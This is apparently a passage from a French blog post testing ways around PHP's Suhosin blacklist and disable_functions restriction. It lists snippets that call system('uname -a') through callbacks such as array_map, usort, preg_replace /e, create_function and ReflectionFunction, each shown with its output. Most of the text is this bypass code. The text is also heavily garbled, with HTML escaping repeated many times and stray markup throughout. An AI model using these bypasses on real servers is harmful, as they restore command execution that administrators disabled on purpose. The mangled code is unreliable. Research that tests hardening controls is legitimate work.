\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_uintersect_assoc (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_uintersect_assoc (array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_uintersect_assoc (PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_uintersect_uassoc\u00a0(PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_uintersect_uassoc (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_uintersect_uassoc (array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’, ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_uintersect_uassoc (PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nregister_shutdown_function (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;register_shutdown_function (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n register_shutdown_function(‘system’, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nregister_shutdown_function (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nFonctions \u00e0 callback et d’\u00e9valuation prot\u00e9g\u00e9es par Suhosin<\/h2>\n
eval (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;eval (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n eval(&amp;amp;amp;amp;quot;system(‘$cmd’);&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\neval (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nPHP Warning: \u00a0system() has been disabled for security reasons in \/var\/www\/x.php(5) : eval()’d code on line 1[\/bash]<\/p>\npreg_replace (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;preg_replace (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n preg_replace(&amp;amp;amp;amp;quot;\/x\/e&amp;amp;amp;amp;quot;,&amp;amp;amp;amp;quot;system(‘$cmd’)&amp;amp;amp;amp;quot;,&amp;amp;amp;amp;quot;x&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\npreg_replace (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nPHP Warning: \u00a0system() has been disabled for security reasons in \/var\/www\/x.php(5) : regexp code on line 1[\/bash]<\/p>\npreg_replace_callback (PHP4 >= 4.0.5, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;preg_replace_callback (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n preg_replace_callback(&amp;amp;amp;amp;quot;\/$cmd\/&amp;amp;amp;amp;quot;, create_function(&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ‘$cmds’,&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ‘return system($cmds[0]);’&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ),&amp;amp;amp;amp;quot;$cmd&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\npreg_replace_callback (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nPHP Warning: system() has been disabled for security reasons in \/var\/www\/x.php(8) : runtime-created function on line 1&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/bash]<\/p>\ncreate_function (PHP4 >= 4.0.1, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.eval.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;create_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.1, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $func = create_function(‘$cmd’, ‘return system($cmd);’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $func($cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\ncreate_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.1, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nPHP Warning: system() has been disabled for security reasons in \/var\/www\/x.php(5) : runtime-created function on line 1&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/bash]<\/p>\nRetour aux m\u00e9canismes de base du php.ini disable_functions<\/h2>\n
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;disable_functions = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;disable_functions&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;call_user_func (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n call_user_func(‘system’, $cmd);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;call_user_func_array (PHP4 &amp;amp;amp;amp;gt;= 4.0.4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n call_user_func_array(‘system’, array($cmd));&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;ob_start (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ob_start(‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo $cmd;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ob_end_flush();&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;ReflectionFunction (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $function = new ReflectionFunction(‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $function-&amp;amp;amp;amp;gt;invoke($cmd);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;iterator_apply (PHP5 &amp;amp;amp;amp;gt;= 5.1.0):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n iterator_apply(new ArrayIterator(array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;)), &amp;amp;amp;amp;quot;system&amp;amp;amp;amp;quot;, array($cmd));&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;register_tick_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.3, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n declare(ticks=1);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n register_tick_function(‘system’, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n unregister_tick_function(‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_map (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_map(‘system’, array($cmd));&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_walk (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array($cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_walk($x, ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_filter (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_filter(array($cmd), ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;usort (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n usort($x, ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;uasort (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n uasort($x, ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_udiff (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_udiff(array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_reduce (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_reduce(array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’, $cmd);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_uintersect_assoc (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_uintersect_assoc (array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;array_uintersect_uassoc (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
